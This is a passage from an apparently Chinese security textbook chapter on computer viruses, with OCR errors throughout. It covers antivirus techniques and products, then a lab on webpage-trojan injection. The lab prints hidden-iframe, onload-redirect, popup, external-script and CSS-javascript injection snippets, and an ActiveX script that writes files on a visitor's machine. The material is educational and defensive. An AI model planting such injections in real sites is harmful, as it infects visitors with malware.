机 上 能 获得 对 各 种 操作 系统 函数 的 访问 ， 导 致 病毒 在 各 类 操作 系统 中 传播 。Java 小 程序 可 
以 被 附加 到 Web 主页 或 电子 邮件 中 ， 一 旦 主页 或 邮件 被 阅读 ， 将 自动 激活 Java 小 程序 。 
Java.StrangBrews 是 第 一 个 Java 小 程序 病毒 ， 当 它 获 取 主 机 控制 权 后 ， 以 本 地 程序 的 身份 
执行 ， 感 染 其 他 class 文件 。 现 在 ， 各 种 浏览 器 (如 微软 的 了 E 和 Netscape 的 Navigator 等 ) 都 
支持 ActiveX 和 Java， 这 为 病毒 的 传播 提供 了 新 的 手段 。 

JavaScript 是 Netscape 公司 继 Sun 的 Java 小 程序 之 后 推出 的 一 种 脚本 语言 。 它 不 仅 支 
持 Java 小 程序 ， 同 时 向 Web 作者 提供 一 种 嵌入 HTML 文档 进行 编程 的 、 基 于 对 象 的 脚本 
程序 设计 语言 ， 采 用 的 许多 结构 与 Java 小 程序 相似 。 由 于 JavaScript 可 以 从 用 户 的 浏览 器 
获取 对 主机 资源 的 使 用 权限 ， 所 以 JavaScript 也 是 病毒 传播 的 重要 手段 。 

2) 邮件 病毒 

邮件 病毒 的 传播 方式 是 通过 邮件 中 的 附件 进行 的 。 这 时 附件 是 一 个 带 毒 文件 ， 如 
Word 宏 病 毒 。 病 毒 的 制造 者 通常 以 极 具 诱 惑 力 的 标题 ， 使 邮件 接收 者 单 击 携带 病毒 的 邮 
件 附 件 。 如 “ 爱 虫 ”病毒 以 “Ilove you” 作 为 邮件 标题 ， 以 情书 的 形式 诱骗 收 件 者 。 

3) 基于 Web 的 防 病毒 技术 

对 于 网 络 病毒 ， 如 ActiveX 和 Java 小 程序 ， 最 简单 的 防护 措施 是 在 浏览 器 中 禁止 这 些 
插件 ， 但 这 直接 影响 了 可 为 用 户 提供 的 服务 质量 。 而 最 有 效 的 方法 是 在 病毒 尚未 被 浏览 器 
获取 前 ， 在 TCP/IP 或 应 用 层 对 接收 的 信息 进行 扫描 ， 这 就 是 病毒 防火 墙 或 病毒 网 关 。 
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传统 的 病毒 扫描 器 一 般 包 含 以 下 组 件 ， 即 病毒 搜索 引擎 、 病 毒 特征 库 和 配置 管理 界面 。 

搜索 引擎 的 设计 是 提高 病毒 扫描 速度 的 关键 技术 。 为 提高 性 能 ， 病 毒 扫 描 引擎 通常 利 
用 规则 和 模式 识别 技术 来 对 成 千 上 万 种 已 知 的 和 未 知 的 计算 机 病毒 进行 监测 ， 这 种 技术 能 

病毒 防火 墙 除了 含有 传统 病毒 扫描 器 中 的 组 件 外 ， 还 增加 了 一 些 新 的 组 件 ， 而 且 各 组 
件 通 过 一 种 柔性 的 、 面 向 对 象 的 设计 原则 有 机 集成 。 

4) 解压 缩 和 解码 

传统 的 病毒 搜索 引擎 一 般 是 在 数据 传输 的 末端 对 病毒 进行 扫描 和 处 理 ， 因 而 不 需要 强 
大 的 解压 缩 和 解密 功能 。 病 毒 防火 墙 的 病毒 搜索 引擎 也 能 在 数据 传输 中 捕获 病毒 ， 因 为 其 
中 嵌入 了 强大 的 实时 解压 缩 和 解密 模块 ， 它 们 能 理解 文件 格式 ， 在 文件 从 服务 器 传输 到 个 
人 计算 机 的 过 程 中 ，“ 阅 读 ” 文 件 头 部 ， 以 判断 哪些 压缩 或 加 密 过 的 文件 可 能 含有 病毒 ， 
然后 只 对 可 能 含有 病毒 的 文件 进行 解压 缩 或 解密 。 这 项 新 的 技术 并 没有 给 系统 资源 增添 负 
担 ， 因 而 极 大 地 提高 了 病毒 扫描 的 效率 。 

5) ActiveX 和 Java 扫描 

病毒 防火 墙 的 ActiveX 和 Java 病毒 扫描 模块 中 ， 通 常 从 以 下 3 个 方面 实现 对 Web 信 
息 中 的 恶意 代码 进行 检测 。 

(1) 支持 “代码 认证 签名 ”。 病 毒 扫描 器 通过 将 Java 小 程序 和 ActiveX 对 象 与 “代码 
认证 签名 库 ” 进 行 匹 配 ， 以 判断 Java 小 程序 和 ActiveX 对 象 是 否 来 自 于 在 传输 过 程 中 没 被 
算 改 的 可 信 源 。 

(2) 识别 Java 类 和 COM 指令 。 病 毒 扫描 器 能 扫描 Java 类 和 COM 指令 ， 通 过 将 这 些 
指令 与 已 知 的 “恶意 小 程序 模式 库 ” 匹 配 来 判断 哪些 Java 类 和 COM 指令 是 有 恶意 的 。 

(3) 基于 规则 的 扫描 技术 。 这 种 新 技术 使 病毒 扫描 器 能 创造 一 种 模拟 环境 来 分 析 Java 
小 程序 和 ActiveX 对 象 的 行为 。 扫 描 器 中 的 代理 把 自己 “寄生 ”在 Java 小 程序 上 并 实时 监 
测 小 程序 的 行为 ， 如 果 发 现 有 恶意 行为 ， 代 理 根据 系统 管理 员 预 先 配 置 的 指令 停止 恶意 代 
码 的 执行 ， 并 向 服务 器 报警 。 

6) 病毒 库 自 动 升级 

在 病毒 防范 管理 中 ， 系 统管 理 员 遇 到 的 两 个 最 主要 的 问题 是 ， 客 户 端 软件 的 升级 和 病 
毒 感染 源 的 跟踪 。 在 新 一 代 的 扫描 引擎 中 ， 一 些 防 病毒 生产 商 伐 入 了 有 具有 自我 管理 功能 的 
通信 组 件 ， 它 知道 何 时 并 怎样 下 载 新 的 病毒 代码 文件 和 扫描 引擎 ， 并 在 没有 管理 员 干 涉 的 
情况 下 为 用 户 进行 所 有 的 配置 和 分 发 工作 。 

这 种 通信 模块 具有 目录 意识 ， 它 能 嵌入 到 公司 的 目录 服务 中 去 ， 并 向 主机 发 送 病毒 通 
知 和 采取 响应 。 例 如 ， 在 某 一 财务 部 门 发 现 了 一 种 病毒 ， 具 有 目录 意识 的 通信 模块 追查 出 
该 病毒 来 自 于 远方 办 公 地 点 的 一 封 E-mail 中 的 电子 表格 附件 ， 它 将 智能 化 地 通知 远方 办 公 
也 点 的 管理 员 、 邮 件 的 发 送 者 和 接收 者 。 

7) 防 邮 件 病毒 技术 

传统 的 防 邮件 病毒 产品 运行 于 客户 端 ， 它 有 两 个 主要 缺点 : 一 是 只 能 查 杀 本 地 硬盘 | 
的 受 病毒 感染 的 文件 ， 而 真正 的 病毒 源 ( 位 于 邮件 服务 器 上 ) 并 没有 得 到 及 时 处 理 ， 如 果 
务 器 没有 受到 保护 ， 可 能 会 使 整个 企业 内 部 的 网 络 受 到 病毒 的 攻击 ;二 是 安装 在 个 人 计算 
机 上 的 防 病毒 软件 需要 不 断 升 级 ， 这 必然 浪费 大 量 的 时 间 和 资源 。 

邮件 病毒 的 搜索 引擎 软件 可 以 安装 在 专用 的 病毒 防火 墙 或 SMTP 邮件 服务 器 上 。 为 实 
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现实 时 检测 ， 防 火 墙 必须 在 端口 25 实时 监测 流 经 防火 墙 的 SMTP 数据 流 ， 即 接收 所 有 的 
SMTP 报 文 ， 检 测 这 些 邮 件 是 否 有 病毒 ， 并 将 这 些 邮 件 转发 到 邮件 的 目的 服务 器 。 
与 Web 病毒 防火 墙 类 似 ， 邮 件 病 毒 防 火 墙 必须 支持 压缩 文件 和 各 类 编码 文件 的 病毒 扫 


描 ， 因 为 黑客 经 常 把 病毒 放 入 具有 压缩 或 加 密 性 质 的 附件 中 以 躲 过 防 病毒 产品 的 监测 。 
通过 网 络 进行 传播 是 网 络 病毒 的 特点 ， 病 毒 主要 通过 HTTP、FTP 和 SMTP 协议 传播 
到 用 户 的 主机 。 服 务 器 、 网 络 接 入 端 和 网 站 是 病毒 进入 用 户主 机 的 必 经 之 路 ， 如 果 在 服务 


器 、 网 络 接 入 端 和 网 站 设置 病毒 防火 墙 ， 可 以 起 到 大 规模 防止 病毒 扩散 的 目的 ， 比 单机 防 
病毒 的 效果 更 好 。 


8.3.3 ”杀毒 技术 


将 染 毒 文件 的 病毒 代码 摘除 ， 使 之 恢复 为 可 正常 运行 的 文件 ， 称 为 病毒 的 清除 ， 有 时 
也 称 为 对 象 恢复 。 清 除 病毒 所 采用 的 技术 称 为 杀毒 技术 。 依 据 病毒 的 种 类 及 其 破坏 行为 的 
不 同 ， 染 毒 后 有 的 病毒 可 以 消除 ， 有 的 病毒 不 能 消除 。 

1. 引导 型 病毒 的 清除 

(1) 引导 型 病毒 感染 时 的 攻击 部 位 。 

Q@ 硬盘 主 引导 扇 区 。 

@ 硬盘 或 软盘 的 BOOT 扇 区 。 

(2) 修复 带 毒 的 硬盘 主 引导 扇 区 。 

2. 宏 病 毒 的 清除 


为 了 恢复 宏 病 毒 ， 须 用 非 文 档 格 式 保存 足够 的 信息 。RTF(Rich Text Format) 适 合 保留 
原始 文档 的 足够 信息 而 不 包含 宏 。 然 后 退出 文档 编辑 器 ， 删 除 已 感染 的 文档 文件 以 及 
NORMAL. DOT 和 start-up 目录 下 的 文件 。 

经 过 上 述 操 作 ， 用 户 的 文档 信息 都 可 以 保留 在 RTF 文件 中 。 这 种 方式 的 缺点 是 打开 和 
保存 文档 时 存在 格式 转换 ， 这 种 转换 增加 了 处 理 时 间 。 另 外 ， 正 常 的 宏 命 令 也 不 能 使 用 。 
因此 ， 在 清除 宏 病 毒 之 前 应 保存 好 正常 的 宏 命 令 ， 宏 病毒 清除 后 再 恢复 这 些 宏 命 令 。 


3. 文件 型 病毒 的 清除 


一 般 文件 型 病毒 的 染 毒 文件 可 以 修复 。 在 绝 大 多 数 情况 下 ， 感 染 文件 的 恢复 都 是 很 复 
杂 的 。 如 果 没有 必要 的 知识 ， 如 可 执行 文件 格式 、 汇 编 语言 等 ， 是 不 可 能 手工 清除 的 。 


4. 病毒 的 去 激活 

清除 内 存 中 的 病毒 是 指 把 RAM 中 的 病毒 导入 非 激活 状态 ， 跟 文件 恢复 一 样 ， 需 要 操 
作 系 统 和 汇编 语言 知识 。 

清除 内 存 中 的 病毒 ， 需 要 检测 病毒 的 执行 过 程 ， 然 后 改变 其 执行 方式 ， 使 病毒 失去 传 
染 能 力 。 这 需要 全 面 分 析 病 毒 代码 ， 因 为 不 同 的 病毒 其 感染 方式 不 同 。 

5. 使 用 杀 病 毒 软件 清除 病毒 

计算 机 一 旦 感染 了 病毒 ， 一 般 的 用 户 首先 想到 的 就 是 使 用 杀 病 毒 软件 来 清除 病毒 。 杀 
病毒 软件 能 清除 大 多 数 病毒 ， 而 且 使 用 方便 ， 技 术 要 求 不 高 ， 不 需要 具备 太 多 的 计算 机 知 
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识 。 但 有 时 也 会 删除 带 毒 文件 ， 使 系统 不 能 正常 运行 。 
使 用 防 杀 病毒 软件 清除 计算 机 病毒 是 普通 用 户 的 首选 ， 但 需要 经 常 升级 病毒 代码 库 ， 
以 便 能 清除 各 种 新 出 现 的 病毒 。 


8.3.4” 反 病毒 软件 


随 着 计算 机 技术 及 反 毒 技术 的 发 展 ， 早 期 的 防 病毒 卡 也 像 其 他 计算 机 硬件 卡 (如 汉字 卡 
等 ) 一 样 ， 逐 步 退出 市 场 ， 与 此 对 应 的 ， 各 种 反 病毒 软件 开始 日 益 风行 起 来 ， 并 且 经 过 十 几 
年 的 发 展 ， 逐 步 经 历 了 好 几 代 反 病 毒 技 术 的 发 展 。 

第 一 代 反 病毒 技术 采取 单纯 的 病毒 特征 代码 分 析 ， 将 病毒 从 带 毒 文 件 中 清除 掉 。 这 种 
方式 可 以 准确 地 清除 病毒 ， 可 靠 性 很 高 。 后 来 病毒 技术 发 展 了 ， 特 别 是 加 密 和 变形 技术 的 
运用 ， 使 得 这 种 简单 的 静态 扫描 方式 失去 了 作用 。 随 之 而 来 的 反 病毒 技术 也 发 展 了 一 步 。 

第 二 代 反 病毒 技术 采用 静态 广 谱 特 征 扫描 方法 检测 病毒 ， 这 种 方式 可 以 更 多 地 检测 出 变形 
病毒 ， 但 另 一 方面 误 报 率 也 有 所 提高 ， 尤 其 是 用 这 种 不 严格 的 特征 判定 方式 去 清除 病毒 带 来 的 
风险 性 很 大 ， 容 易 造成 文件 和 数据 的 破坏 。 所 以 ， 静 态 防 病毒 技术 也 有 难以 克服 的 缺陷 。 

第 三 代 反 病毒 技术 的 主要 特点 是 将 静态 扫描 技术 和 动态 仿真 跟踪 技术 结合 起 来 ， 将 查 
找 病毒 和 清除 病毒 合 二 为 一 ， 形 成 一 个 整体 解决 方案 ， 能 够 全 面 实现 防 、 查 、 杀 等 反 病 毒 
所 必 备 的 各 种 手段 ， 以 驻 留 内 存 方式 防止 病毒 的 入 侵 ， 凡 是 检测 到 的 病毒 都 能 清除 ， 不 会 
破坏 文件 和 数据 。 随 着 病毒 数量 的 增加 和 新 型 病毒 技术 的 发 展 ， 静 态 扫描 技术 将 会 使 反 毒 
软件 速度 降低 ， 驻 留 内 存 防毒 模块 容易 产生 误 报 。 

第 四 代 反 病毒 技术 则 针对 计算 机 病毒 的 命名 规则 ， 基 于 多 位 CRC 校 验 和 扫描 机 理 ， 
启发 式 智能 代码 分 析 模 块 、 动 态 数据 还 原 模块 (能 查 出 隐蔽 性 极 强 的 压缩 加 密 文 件 中 的 病 
毒 )、 内 存 解 毒 模 块 、 自 身 免疫 模块 等 先进 的 解毒 技术 ， 较 好 地 解决 了 以 前 防毒 技术 顾 此 失 
彼 、 此 消 彼 长 的 状态 。 

反 病 毒 软件 伴随 着 反 病毒 技术 的 不 断 提高 而 功能 越 来 越 强 ， 可 以 清除 大 多 数 病毒 。 

杀毒 软件 市 场 潜力 巨大 ， 世 界 杀 毒 软 件 巨头 之 一 的 赛 门 铁 克 (Symantec) 公 司 2004 年 的 
收入 已 经 达到 了 18.7 亿美 元 ， 其 产品 包括 网 络 安全 的 各 个 方面 ， 杀 毒 产品 为 诺顿 Gorton 
Antivirus)。 国 内 的 杀毒 软件 市 场 基 本 形成 瑞星 、 江 民 、 金 山 三 足 易 立 的 局 面 。 


1. 瑞星 杀毒 软件 


瑞星 (http://www .rising.com.cn) 北 京 瑞星 科技 股份 有 限 公司 的 产品 ， 在 国内 市 场 占有 率 
为 60% 左 右 。 

北京 瑞星 科技 股份 有 限 公司 成 立 于 1998 年 4 月 ， 公 司 以 研究 、 开 发 、 生 产 及 销售 计 
算 机 反 病 毒 产 品 、 网 络 安全 产品 和 “黑客 ”防治 产品 为 主 ， 软 件 产品 全 部 拥有 自主 知识 产 
权 ， 能 够 为 个 人 人、 企业 和 政府 机 构 提 供 全 面 的 信息 安全 解决 方案 。 


2. 金山 毒霸 


山 毒 霸 (http://db.kingsoft.com) 是 金山 软件 股份 有 限 公司 的 产品 ， 在 国内 市 场 占有 率 
为 15% 左 右 。 
金山 软件 创建 于 1988 年 ， 金 山 毒 霸 是 中 国信 息 安 全 及 反 病毒 领域 极 具 品 牌 影响 力 、 
拥有 较 高 市 场 占有 率 和 领先 技术 的 产品 。 
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如 今 各 式 各 样 的 病毒 在 网 络 上 横行 ， 其 中 ， 网 页 病毒 、 网 页 挂 ( 木 ) 马 在 新 型 的 病毒 大 
军 中 危害 面 最 广 、 传 播 效果 最 佳 。 网 页 病毒 、 网 页 挂 ( 木 ) 马 之 所 以 非常 流行 ， 是 因为 它们 
的 技术 含量 比较 低 、 免 费 空间 和 个 人 网 站 增多 、 上 网 人 群 的 安全 意识 比较 低 ， 另 外 ， 国 内 
网 页 挂 ( 木 ) 马 大 多 是 针对 正 浏览 

本 节 通 过 实例 介绍 网 页 病毒 、 网 页 挂 ( 木 ) 马 。 

1. 实验 环境 

实验 环境 如 图 8.3 所 示 。 


192.168.10.1 
192.168.10.2 


中 pl 192.168.10.5 


Windows Server 2003 Windows XP 
Web 上 服务 器 入 侵 者 


图 8.3 实验 环境 


2. 实验 过 程 

(1) 设置 人 P 地 址 。 在 Windows Server 2003 系统 上 ， 对 本 台 计 算 机 的 网 卡 设置 两 个 全 地 
址 ， 如 图 8.4 所 示 ， 目 的 是 要 在 本 台 计算 机 上 架设 基于 人 P 地 址 (192.168.10.1、192.168.10.2) 的 
两 个 网 站 。 

(2) 打开 “Intermet 信息 服务 (IIS) 管 理 器 ”。 在 Windows Server 2003 系统 上 ， 打 开 
“Internet 信息 服务 (IIS) 管 理 器 ”窗口 ， 如 图 8.5 所 示 ， 右 击 “ 默 认 网 站 ”， 选 择 快捷 菜单 
中 的 “属性 ”命令 ， 如 图 8.6 所 示 ， 为 本 网 站 选择 的 了 P 地 址 是 192.168.10.1。 


高 级 TCP/I? 设置 


% 
严 设 量 |ms ws | 过 项 | 


ZT62003 (本 地 计算 机 ) | 声 ?ESDats Ci\Progron File.. 
站 点 PBServer Ci\Progran File， 


Oc C: \WINDOWS\Syst. 
RPMithcert CNWTNDOYS\Syst 
Dm 


确定 取消 
图 8.4 “高 级 TCP/IP 设置 ”对 话 框 图 8.5 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 


(3) 创建 网 站 。 在 Windows Server 2003 系统 中 ， 右 击 “ 网 站 ”， 依 次 选择 快捷 菜单 中 
的 “新 建 ” 和 “网 站 ”命令 ， 如 图 8.7 所 示 ， 开 始 创建 网 站 ， 创 建 过 程 如 图 8.8 至 图 8.13 


所 示 。 
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图 8.6 “默认 网 站 属性 ”对 话 框 


欢迎 使 用 网 站 创建 向 导 


此 向导 各 由 您 在 计算 机 上 新 建 一 个 网 站 - 


要 屿 续 ,请 单 击 “ 下 一 步 ”。 
0 
“网 站 创建 向 导 ” 欢 迎 界 面 


图 8.8 


天 Interaet 信息 服务 IIS) 管理 回 
司 文件 四 损 作 @)， 查看 WV) 窗口 和 才 助 了 D 


各 了 | 回 困 | 轩 日 本 | 国 国 | 昱 | 
默认 网 站 1 


全 Aninistration 


Internet 信 咎 服务 
瑟 名 zrzo03 体 地 计算机 ) 


图 8.7 开始 创建 网 站 


网 站 创建 向 导 [x] 
网站 大 过 多 
同 站 塘 述 由于 攻 助 首 理 员 识别 站 点 ， ,大 
新 入 网 站 搞 。 
拉 坟 四 )-: 


| 


《上 一 步 友 ) 职 消 


图 8.9 “网 站 描述 ”界面 


网 站 全 津 向 导 


Te 地址 和 端口 设置 

指定 新 问 让 的 IP 地 址 ， 负 口 访 轩 和 主机 站 。 i 
CE i 入 生生 ， 

一 路 径 @@): 

网 站 TCP 稿约 认 从 :90) 中; | Er 

局 克基 名 六 同 同 站 四 

此 网 站 的 主机 头 本 认 : 无)00 

让 尖 更 信息， 请 则 TTs 产品 档 。 

< ES 性 -本 | <+-5m[T | 
“IP 地 址 和 端口 设置 ”界面 图 8.11 “网 站 主 目录 ”界面 
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图 8.10 
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EEEEES 四 
网站 访问 权限 他 己 成 功 完成 网 站 创建 向 导 。 
设 于 此 胸 站 的 访问 权限 。 迟 
多 洗 下列 权限: 
万 读 职 四 


克 运行 脚本 0 ASP) 8) 
i 匡 记 用 本 吉 ET 国 


单 击 “ 下 一 步 ”按钮 完成 向 导 - 要 做 这 些 更 改 ,请 单 击 “ 完 成 ”- 


TE | 
图 8.12 “网 站 访问 权限 ”界面 图 8.13 ”网 站 创建 完成 


(4) 创建 www_muma 网 站 的 主 目录 。 在 Windows Server 2003 系统 中 ， 在 Inetpub 文件 
夹 中 创建 www_muma 子 文件 夹 ， 如 图 8.14 所 示 ， 该 文件 夹 就 是 第 (3) 步 新 建 网 站 的 主 目 
录 。wwwroot 是 默认 网 站 的 主 目录 。 

(5) 复制 网 站 文件 。 在 Windows Server 2003 系统 中 可 以 将 两 个 简单 的 网 站 文件 分 别 复 
制 到 wwwroot 和 www_muma 文件 夹 中 。 


| 


二 ES 人 
四 ， 查看 o) 收 着 工具 O ”| 圳 
[人 


地 址 四) [BS cvTnetpw SEa 


2008-3-16 21:29 
2008-3-16 21:31 
2008-3-16 21:31 
2008-3-20 16:57 
2008-3-20 16:49 


图 8.14 创建 www_muma 子 文件 夹 


编辑 wwwroot 文件 夹 中 的 INDEX.HTM 文件 ， 在 该 文件 源 代码 的 </body>…</body> 之 
间 插入 如 图 8.15 所 示 的 被 圈 部 分 代码 。 
王 注意 : ”这 一 步 的 前 提 是 入 侵 者 成 功 入 侵 了 一 个 网 站 (本 例 中 是 指 默 认 网 站 
wwwroot)， 这 样 就 可 以 对 入 侵 网 站 的 网 页 文件 进行 修改 、 植 入 网 页 木马 或 病 
毒 等 。 如 何 成 功 入 侵 一 个 网 站 呢 ? 读者 可 以 使 用 前 面 介 绍 的 方法 或 者 求助 于 
网 络 ， 不 过 入 侵 和 签 改 他 人 服务 器 上 的 信息 属于 违法 行为 ， 本 教程 之 所 以 介绍 
这 些 内 容 ， 是 让 大 家 了 解 各 种 黑客 入 侵 技术 ， 更 好 地 保障 自己 的 信息 系统 的 安 
全 ， 也 希望 大 家 不 要 利用 这 些 技术 进行 入 侵 活动 ， 而 是 共同 维护 网 络 安全 。 
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本 rmzr me - 记事 本 西 回回 
文 折 加， 训 竹 四， 格式 D) 查看 WW 帮助 加 

</head> 习 
《body background='"ing/bj.jpg”leftnargin="8'”topnargin="gB"> Es] 


/table> 


Fane src=http://192.168.19.2/index.htn width=29 height=29 frameborder=1> 


‘<table width="769" border="0" align="center" cellpadding="*9" cellspacing="0"> 
<tr> 


<td width="769" background="ing/banner1.gif">Cing src="ing/banner2.gif” 
vidth="200" height="190"><ing src="ing/banner .gif” width="517" height="100"></td> 
/tr> 


8.15 ” wwwroot 文件 夹 中 的 INDEX.HTM 文件 


(6) 打开 浏览 器 。 在 Windows XP 上 ， 打 开 浏 览 器 (IE 或 者 Firefox)， 在 地 址 栏 中 输入 
192.168.10.1， 结 果 如 图 8.16 所 示 。 


Yimw Nistory Boomerks Tools Nelp 


-CC 者 [Mio 


8.16 ”访问 wwwroot 网 站 一 一 网 页 典 入 


站 注意 : 图 中 左上 角 的 被 圈 部 分 ， 是 图 中 椭圆 部 分 代码 的 效果 . 


代码 : <iframe src=http://192.168.10.2/INDEX.HTM width=20 height=20 frameborder=1> 
</ittame> 其 实 就 是 大 家 时 常 所 说 的 网 页 病毒 、 网 页 挂 马 的 一 种 方式 ， 不 过 在 本 测试 中 ， 仅 


仅 是 在 原 网 站 的 首页 


FP 柑 入 了 另 一 个 网 页 ， 如 果 把 width、height 和 frameborder 都 设置 为 


0， 那 么 在 原 网 站 的 首页 不 会 发 生 任 何 变 化 ， 但 是 ， 典 入 的 网 页 
(192.168.10.2/INDEX.HTM， 该 INDEX.HTM 文件 称 为 网 页 病毒 或 网 页 木马 ) 实 际 上 已 经 打 
开 了 ， 如 果 192.168.10.2/INDEX.HTM 中 包含 恶意 代码 ， 那 么 浏览 者 就 会 受到 不 同 程度 的 攻 
击 。 如 果 192.168.10.2/INDEX.HTM 是 网 页 森马， 那么 所 有 访问 该 网 站 首页 的 人 都 会 中 木 
马 。 网 页 上 的 下 载 木 马 和 运行 木马 的 脚本 还 是 会 随 着 门户 首页 的 打开 而 执行 。 
苇 提示 :， <iframe> 称 为 浮动 帧 标签 ， 它 可 以 把 一 个 HTML 网 页 嵌入 到 另 一 个 网 页 里 实 
现 画 中 画 的 效果 ( 见 图 8.17)， 被 谈 入 的 网 页 可 以 控制 宽 、 高 以 及 边框 大 小 和 
大 家 在 打开 一 些 著名 的 网 站 时 杀毒 软件 会 报警 ， 或 者 在 使 用 Google 进 
行 搜索 后 ， 搜 索 结果 中 有 些 条 目 提示 说 此 网 站 会 损害 计算 机 ， 主 要 原因 在 于 
这 些 网 站 的 网 页 中 被 植 入 了 木马 或 病毒 。 
(7) 编辑 wwwroot 中 的 INDEX.HTM 文件 。 在 Windows Server 2003 系统 中 ， 编 辑 
Ci\InetpubWwwwroot\IINDEX.HTM 文件 ， 插 入 如 图 8.17 所 示 的 被 圈 部 分 代码 。 
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本 JDEY. HT - 记事 本 
文件 于) 六 辑 里) 格式 也 ) 查看 帮助 如 


</head> 习 


<table width-"769”border=vg a adn cellspacing="0"> 
<tr> 


《td width="769" background="ing/banner1.9if">¢ing src="ing/banner2.gif" 


图 8.17 wwwroot 文件 夹 中 的 INDEX.HTM 文件 


(8) 打开 浏览 器 。 在 Windows XP 系统 中 打开 浏览 器 (IE 或 者 Firefox)， 在 地 址 栏 中 输 
入 192.168.10.1， 结 果 如 图 8.18 所 示 。 


图 8.18 ”访问 wwwroot 网 站 一 一 弹出 新 窗口 
肖 注意 : ”图 8.18 中 左上 角 的 被 图 部 分 ， 是 图 8.17 中 椭圆 部 分 代码 的 效果 。 


如 果 把 width、height 都 设置 为 1( 如 果 设 置 为 0， 访 问 192.168.10.1 网 站 时 弹出 的 木马 
网 页 是 全 屏 )， 那 么 在 原 网 站 的 首页 基本 不 会 发 生变 化 ， 但 是 ， 和 嵌入 的 网 页 (192.168.10.2/ 
INDEX.HTM,， 该 INDEX.HTM 文件 称 为 网 页 病毒 或 网 页 木马 ) 实 际 上 已 经 打开 了 。 

(9) 编辑 www_muma 文件 夹 中 的 INDEX.HTM 文件 。 在 Windows Server 2003 系统 
中 ， 编 辑 C:\InetpubWwww_muma\INDEX.HTM 文件 ， 插 入 图 8.19 所 示 的 被 圈 部 分 代码 。 


文件 四 蝙 辑 全) 格式 人 0) 查看 QV) 帮助 0 


Ktitle> 常 青 网 站 </title> 
/head> 


Script language-javascript> | 
cs-— 


var Fso,f1, fF2, fF3, 55 

fs9 = new ActivexObject("scripting.Filesystenobject"); 
f1 = Fso.CreateTextFile("c:\\testfile.txt",true); 
f1-Write("aaaaaaaaaaaaaaaaaaaaaaaa333333a3a3aa-") 1 
F1-Close(); 

f2 = Fso.GetFile("c:\\testfile.txt"); 


f2-Moue ("d:\\testfile.txt"); 

fF2.Copy (“d:\\testfile2.txt"); 

f2 = fso.GetFile("d:\\testfile.txt"); 
f3 = fso.GetFile("d:\\testfile2.txt"); 
1/F2.Delete(); 

M/F3.Delete(); 


jeeripty 


te wiothe760" height="507" border="1" cellspacing~1 bordercolor="#909980"> 


到 


图 8.19 www_muma 文件 夹 中 INDEX.HTM 文件 
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(10) 打开 IE 浏览 器 。 在 Windows XP 系统 中 ， 打 开 正 浏览 器 ， 在 地 址 栏 输入 
192.168.10.1， 此 时 ， 网 页 木马 已 经 在 自己 的 计算 机 中 创建 了 两 个 文件 ， 如 图 8.20 所 示 。 
注意 : ”在 Firefox 浏览 器 中 ， 步 骤 (9) 的 Javascript 脚本 不 能 很 好 地 执行 。 由 此 可 见 ， 

目前 的 大 多 数 网 页 木马 或 网 页 病毒 是 针对 JIE 浏览 器 的 ， 所 以 ， 为 了 上 网 安 
全 ， 可 以 选择 使 用 Firefox 浏览 器 ， 不 过 有 些 时 候 Firefox 浏览 器 不 能 够 正常 
访问 一 些 网 站 ， 因 此 读者 可 以 根据 不 同 需求 选用 不 同 的 浏览 器 。 


文件 @) 编辑 EE) 查看 中 收 豪 ) 工具 CD) 帮助 0D 

3 网 页 木马 创 
四 银 - 园 :让 用 时 防 xix 国 - 建 的 文件 
地 址 @) <p D:\ > 


从 名 称 ~ 修改 日 其 


大 
文件 和 文件 夹 任 务 。 [和 BOutlook Express 多 2007-11-30 5:54 


可 好 E 一 个 新 文件 天 辐 Premm Files A 文件 守 2007-11-30 3:52 
3 Resy 一 e807=11-30 6.03 
9 ee ee Testfile txt 1 了 三 文本 文档 。 2008-3-21 9: 葬 


大 共 这 此 文件 天 


图 8.20 网 页 木马 创建 的 文件 
3. 一 些 常用 的 挂 马 方式 
(1) 框架 挂 马 。 代 码 如 下 : 
<iframe src=" 网 马 地 址 " width=0 height=0></iframe> 
(2) body 挂 马 。 代 码 如 下 : 
<body onload="window.1location=' 网 马 地 址 ';"></body> 


(3) java 挂 马 。 代 码 如 下 : 


<script language=javascript> 

window .open ("网 马 地 址 ","", "toolbar=no,，1location=no, directories=no, 
status=no, menubar=no, scrollbars=no, width=1, height=1"); 
</script> 


(4)js 文件 挂 马 。 

首先 将 代码 “document.write("<iframe width=0 height=0 src=' 网 马 地 址 ></iframe>");” 
保存 为 mumajs 文件 ， 则 js 文件 挂 马 代码 为 “<script language=javascript src=muma.js> 
</script>”。 

(5) css 中 挂 马 。 代 码 如 下 : 

body{ 

background-image: url(' 

javascript:document .write("<script 


src=http://www.yyy-.net/muma.js></script>")') 
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(6) 高 级 欺骗 。 代 码 如 下 : 


<a href=http://www-sohu-com (迷惑 连接 地 址 ) onMouseover="muma () ;return 
true;"> 搜狐 首页 </a> 

<script language=javascript> 

function muma () 


open (" 网 马 地址 ","", "toolbar=no，1location=no，directories=no，status=no， 
menubar=no, scrollbars=no, width=1, height=1"); 
} 


</script> 
复习 思考 题 八 
一 、 填 空 题 
1. 计算 机 病毒 按 破 坏 程度 分 类 可 以 分 为 病毒 和 病毒 。 
2. 基于 传染 方式 不 同 ， 计 算 机 病毒 可 分 为 病毒 、 病毒 和 病毒 3 种 。 
3. 按照 病毒 特有 的 算法 ， 可 以 将 计算 机 病毒 划分 为 病毒 、 病毒 和 
病毒 。 
4. 按照 病毒 的 链接 方式 ， 可 以 将 计算 机 病毒 划分 为 病毒 、 病毒 、 
5. 网 络 反 病毒 技术 包括 和 等 3 种 技术 。 
6. 计算 机 病毒 传播 的 途径 一 般 有 和 3 种 。 
二 . 选择 题 
1. 计算 机 病毒 是 一 种 ( )。 
A. 软件 故障 B. 硬件 故障 C. 程序 D. 黑客 
2. 下 列 不 属于 计算 机 病毒 特征 的 是 (  )。 
A. 传染 性 B. 潜伏 性 C. 破坏 性 D. 免疫 性 
3. 下 列 属于 杀毒 软件 的 是 (  )。 
A. Microsoft Access B. KV3000 
C. MS-DOS D.Photoshop 


4. 计算 机 病毒 是 一 种 破坏 计算 机 功能 或 者 毁坏 计算 机 中 所 存储 数据 的 (  )。 
A. 程序 代码 B. 微生物 病菌 。 C. 计算 机 专家 DD. 计算 机 硬件 
5. 木马 程序 一 般 是 指 潜藏 在 用 户 计 算 机 中 带 有 恶意 性 质 的 ， 利 用 它 可 以 在 用 户 不 知情 
的 情况 下 窃取 用 户 联网 计算 机 上 的 重要 数据 信息 的 ( )。 
A. 远程 控制 软件 B. 计算 机 操作 系统 
